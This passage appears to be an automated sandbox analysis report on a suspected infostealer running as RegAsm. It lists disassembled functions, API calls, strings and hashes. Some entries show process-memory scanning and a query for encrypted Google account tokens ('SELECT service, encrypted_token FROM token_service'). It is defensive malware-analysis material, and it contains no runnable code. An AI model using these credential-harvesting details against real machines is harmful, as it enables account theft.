                                                                                                        • Opcode ID: 25388371f2af568c842e4e38ec64d340a8c1e358162027de576c230b27f07d72
                                                                                                        • Instruction ID: 0e146521033460379f3d84f55f1e4a4ecc96635298c77564c0789712bee605c8
                                                                                                        • Opcode Fuzzy Hash: 25388371f2af568c842e4e38ec64d340a8c1e358162027de576c230b27f07d72
                                                                                                        • Instruction Fuzzy Hash: 46510071A043159BEB00DF29DC89B6B77E5EFA4348F15052CEC59A7610E731E819CF92
                                                                                                        Function 6C0CCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C0931A7), ref: 6C0CCDDD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                        • API String ID: 4275171209-2186867486
                                                                                                        • Opcode ID: e60bf130e2fda392b2b8c18d7e49e7ce3bac1c9e7d678e28b1449d46eee18fed
                                                                                                        • Instruction ID: f7d4433ce6ec9942036e9c3d29bb22080e8579d2a5a77bd39b1eea654d8486e5
                                                                                                        • Opcode Fuzzy Hash: e60bf130e2fda392b2b8c18d7e49e7ce3bac1c9e7d678e28b1449d46eee18fed
                                                                                                        • Instruction Fuzzy Hash: 4331E2707452165BFB10AFA9CC46BAE7AF5AF45708F204018F611ABF80DBB4E5018BA2
                                                                                                        Function 6C14E890 Relevance: 12.4, APIs: 5, Strings: 3, Instructions: 442stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C14E922
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C14E9CF
                                                                                                        • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C14EA0F
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C14EB20
                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C14EB57
                                                                                                        Strings
                                                                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6C14EDC2
                                                                                                        • unknown column "%s" in foreign key definition, xrefs: 6C14ED18
                                                                                                        • foreign key on %s should reference only one column of table %T, xrefs: 6C14EE04
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpystrlen$memset
                                                                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                        • API String ID: 638109778-272990098
                                                                                                        • Opcode ID: c623be437c795a222aec1ce7d4d8843f4f69fa20716612b32e1ef1ef54c39d8b
                                                                                                        • Instruction ID: 729ef8960e87d0fbd8a12f018375fc223f573a76cc0e7b90d2939986fcfde88a
                                                                                                        • Opcode Fuzzy Hash: c623be437c795a222aec1ce7d4d8843f4f69fa20716612b32e1ef1ef54c39d8b
                                                                                                        • Instruction Fuzzy Hash: 34029F71E01209CFDB04CF59C490AAEF7B2BF99318F298169D815AB751D735AA42CBE0
                                                                                                        Function 0040F915 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040F934
                                                                                                        • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000), ref: 0040F95E
                                                                                                        • ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0040F9AB
                                                                                                        • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040FA04
                                                                                                        • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0040FA5C
                                                                                                        • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040FA6D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessQueryReadVirtual
                                                                                                        • String ID: @
                                                                                                        • API String ID: 3835927879-2766056989
                                                                                                        • Opcode ID: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
                                                                                                        • Instruction ID: 782d1e78530d26aac93c20cf39dad9713f636d1ba6f6d7f846141922d26d4ee5
                                                                                                        • Opcode Fuzzy Hash: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
                                                                                                        • Instruction Fuzzy Hash: B8419D32A00209BBDF209FA5DC49FDF7B76EF44760F14803AFA04A6690D7788A55DB94
                                                                                                        Function 6C282F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C282FFD
                                                                                                        • sqlite3_initialize.NSS3 ref: 6C283007
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C283032
                                                                                                        • sqlite3_mprintf.NSS3(6C2EAAF9,?), ref: 6C283073
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C2830B3
                                                                                                        • sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C2830C0
                                                                                                        Strings
                                                                                                        • sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C2830BB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
                                                                                                        • String ID: sqlite3_get_table() called with two or more incompatible queries
                                                                                                        • API String ID: 750880481-4279182443
                                                                                                        • Opcode ID: db03b5292eab2ff729cb66c0693e16303627dfb462b00d6454e4ecb364fe7a74
                                                                                                        • Instruction ID: 8709bac915b3f7f261c21cc9dfd89b6b594ce055e56e9c3cdcecbe4ba908b7ed
                                                                                                        • Opcode Fuzzy Hash: db03b5292eab2ff729cb66c0693e16303627dfb462b00d6454e4ecb364fe7a74
                                                                                                        • Instruction Fuzzy Hash: D341D37560160AAFDB00CF25D840A86B7B5FF54359F148628FC598BB80EB31F969CBD1
                                                                                                        Function 6C1C8CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(00000000,00000000,?,6C1D124D,00000001), ref: 6C1C8D19
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C1D124D,00000001), ref: 6C1C8D32
                                                                                                        • PL_ArenaRelease.NSS3(?,?,?,?,?,6C1D124D,00000001), ref: 6C1C8D73
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C1D124D,00000001), ref: 6C1C8D8C
                                                                                                          • Part of subcall function 6C25DD70: TlsGetValue.KERNEL32 ref: 6C25DD8C
                                                                                                          • Part of subcall function 6C25DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C25DDB4
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C1D124D,00000001), ref: 6C1C8DBA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                        • String ID: KRAM$KRAM
                                                                                                        • API String ID: 2419422920-169145855
                                                                                                        • Opcode ID: d2bf8721c922c5e732c5a662cf378828596f7aff603367cf10c98247819f3b9b
                                                                                                        • Instruction ID: dd1e56b7db347188f615a9d50fba2ca9b9d22071df4a57f78be730e2fe4482dc
                                                                                                        • Opcode Fuzzy Hash: d2bf8721c922c5e732c5a662cf378828596f7aff603367cf10c98247819f3b9b
                                                                                                        • Instruction Fuzzy Hash: 472182B57046058FDB00EF78C48466AB7F4FF65314F15896AEC8887701D738D881CB92
                                                                                                        Function 6C2C0ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C2C0EE6
                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C2C0EFA
                                                                                                          • Part of subcall function 6C1AAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C1AAF0E
                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F16
                                                                                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F1C
                                                                                                        • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F25
                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F2B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                        • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                        • API String ID: 2948422844-1374795319
                                                                                                        • Opcode ID: 38c68512784c48790b695031445c6c51da477aac67e92e1acce38cd5181ea056
                                                                                                        • Instruction ID: 7101927f01efac39f27e6afcf87f8950e4eb6f70ea8eaed2b52cee2645d98858
                                                                                                        • Opcode Fuzzy Hash: 38c68512784c48790b695031445c6c51da477aac67e92e1acce38cd5181ea056
                                                                                                        • Instruction Fuzzy Hash: DD01ADB6A00108ABDF01AF68EC4989B3B6CEF46668B004029FD0987641D675E950DAA3
                                                                                                        Function 6C0D9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C0CAB89: EnterCriticalSection.KERNEL32(6C11E370,?,?,?,6C0934DE,6C11F6CC,?,?,?,?,?,?,?,6C093284), ref: 6C0CAB94
                                                                                                          • Part of subcall function 6C0CAB89: LeaveCriticalSection.KERNEL32(6C11E370,?,6C0934DE,6C11F6CC,?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C0CABD1
                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0A4A68), ref: 6C0D945E
                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0D9470
                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0D9482
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0D949F
                                                                                                        Strings
                                                                                                        • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C0D947D
                                                                                                        • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C0D946B
                                                                                                        • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C0D9459
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                        • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                        • API String ID: 4042361484-1628757462
                                                                                                        • Opcode ID: a761b83083c9cc420b360cbfa373589873dd2516b5923751c2e217bab648e386
                                                                                                        • Instruction ID: 89b5de8be999744ccd30725b70b62d3c1ba5a5aaa9a93284568c6b920bf44b49
                                                                                                        • Opcode Fuzzy Hash: a761b83083c9cc420b360cbfa373589873dd2516b5923751c2e217bab648e386
                                                                                                        • Instruction Fuzzy Hash: 63012838A042008BE700DB5EEA26F4A33F49B0532DF154537E80687F42DA3DF5549957
                                                                                                        Function 6C284D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C284DC3
                                                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C284DE0
                                                                                                        Strings
                                                                                                        • misuse, xrefs: 6C284DD5
                                                                                                        • invalid, xrefs: 6C284DB8
                                                                                                        • %s at line %d of [%.10s], xrefs: 6C284DDA
                                                                                                        • API call with %s database connection pointer, xrefs: 6C284DBD
                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C284DCB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_log
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                        • API String ID: 632333372-2974027950
                                                                                                        • Opcode ID: fb4f10f81b8a6ea9e28d10b7215aa0858f680ebea33a0e5a02f6a3ca1c767846
                                                                                                        • Instruction ID: ccea558c5ced9b936ac883bdbc1f33a05820d7f852ac0e28e0e50e63c43543b4
                                                                                                        • Opcode Fuzzy Hash: fb4f10f81b8a6ea9e28d10b7215aa0858f680ebea33a0e5a02f6a3ca1c767846
                                                                                                        • Instruction Fuzzy Hash: DAF0E919E1666D6BD700C125DC31F86379D4F0531BF8A09A2FD047BED3D205987882C1
                                                                                                        Function 6C284DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C284E30
                                                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C284E4D
                                                                                                        Strings
                                                                                                        • misuse, xrefs: 6C284E42
                                                                                                        • invalid, xrefs: 6C284E25
                                                                                                        • %s at line %d of [%.10s], xrefs: 6C284E47
                                                                                                        • API call with %s database connection pointer, xrefs: 6C284E2A
                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C284E38
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_log
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                        • API String ID: 632333372-2974027950
                                                                                                        • Opcode ID: 1117682d1203ae9514179f5d9b64c92113bd53e89a3e33b1ab8fb915ded3c8f6
                                                                                                        • Instruction ID: cf25354fe2ce7ef50467e4c7aa7340869f6c5d42d01e4668b12aacd0e4ff2d62
                                                                                                        • Opcode Fuzzy Hash: 1117682d1203ae9514179f5d9b64c92113bd53e89a3e33b1ab8fb915ded3c8f6
                                                                                                        • Instruction Fuzzy Hash: B2F02715E4692D2BE7148126DC30F83378D4B1532BF8944B1FE0877ED2E305987842F1
                                                                                                        Function 00409A0E Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 223stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00409BB2
                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 00409BCF
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00409C7E
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00409C99
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpylstrlen$lstrcat$AllocLocal
                                                                                                        • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                        • API String ID: 3306365304-1713091031
                                                                                                        • Opcode ID: 23a8635a48a7421f52fb52e76b1e4f954d6a09d0e6bce8243b1f57598da2cf87
                                                                                                        • Instruction ID: bcd8a3c27cc20b2b0202687c0b5b9a5b34e989406908c304105e5c1fc2b99bb7
                                                                                                        • Opcode Fuzzy Hash: 23a8635a48a7421f52fb52e76b1e4f954d6a09d0e6bce8243b1f57598da2cf87
                                                                                                        • Instruction Fuzzy Hash: 45815171E40109ABCF01FFA5DE469DD77B5AF04309F511026F900B71E2DBB8AE898B99
                                                                                                        Function 6C1F0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(00000000,00000000,6C1F1444,?,00000001,?,00000000,00000000,?,?,6C1F1444,?,?,00000000,?,?), ref: 6C1F0CB3
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C1F1444,?,00000001,?,00000000,00000000,?,?,6C1F1444,?), ref: 6C1F0DC1
                                                                                                        • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C1F1444,?,00000001,?,00000000,00000000,?,?,6C1F1444,?), ref: 6C1F0DEC
                                                                                                          • Part of subcall function 6C210F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C1B2AF5,?,?,?,?,?,6C1B0A1B,00000000), ref: 6C210F1A
                                                                                                          • Part of subcall function 6C210F10: malloc.MOZGLUE(00000001), ref: 6C210F30
                                                                                                          • Part of subcall function 6C210F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C210F42
